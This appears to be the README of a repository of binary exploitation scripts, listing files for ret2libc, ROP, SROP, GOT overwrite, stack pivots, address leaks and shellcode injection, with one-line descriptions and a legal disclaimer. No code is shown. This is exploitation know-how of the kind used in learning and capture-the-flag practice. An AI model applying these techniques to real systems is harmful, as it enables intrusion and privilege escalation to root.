A collection of exploit scripts/templates and short descriptions covering common binary exploitation techniques (ROP, ret2libc, stack pivots, leaks, SROP, GOT overwrite, etc.)
over time, this collection of exploits will be expanded.
-
canary_ret2libc.py -> Bypasses stack canary, leaks libc address, then returns into libc (e.g., system) to spawn a shell.
-
fill_registers.py -> Sets specific CPU registers via gadgets to prepare arguments or a pivot for a ROP chain.
-
got_overwrite.py -> Overwrites a GOT entry to redirect a function call to attacker-controlled code or another libc function.
-
leaking_addr.py -> Leaks a memory address (binary or libc) via an information disclosure to compute offsets.
-
leaking_addr2.py -> Alternative leak (e.g., format string/write) to obtain addresses for ASLR/PIE bypass.
-
pie_canary_ret2win.py -> Defeats PIE and canary protections, then redirects execution to an in-binary "win" function.
-
pie_ret2libc.py -> Uses a leak to defeat PIE/ASLR, then returns into libc to call system/execve.
-
ret2libc.py -> Returns into libc functions (like system) using known libc addresses to execute a shell.
-
ret2syscall.py -> Prepares registers and triggers a syscall directly (e.g., execve) without libc.
-
rop.py -> Chains gadgets (ROP) to perform arbitrary actions or call functions without injecting code.
-
srop.py -> Builds a sigreturn frame to set many registers at once and invoke a syscall (SROP).
-
leaking_addr3.py -> Leaks addresses over an SSH channel or remote service to bypass ASLR remotely.
-
stack_pivot.py -> Performs a stack pivot (e.g., xchg/leave/add to RSP) to point RSP at attacker-controlled data containing a ROP chain.
-
ret2csu_ret2win.py -> Uses a __libc_csu_init ROP frame to set registers and call an in-binary "ret2win" function.
-
hijack_shellcode.py -> Places shellcode into the input buffer and overwrites the return pointer to jump directly to that shellcode.
-
ret2libc_setuid(0).py -> Leaks address, then builds a ROP chain that calls setuid(0) then system("/bin/sh") to get a root shell.
Usage of exploits for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Author assume no liability and are not responsible for any misuse or damage caused by scripts.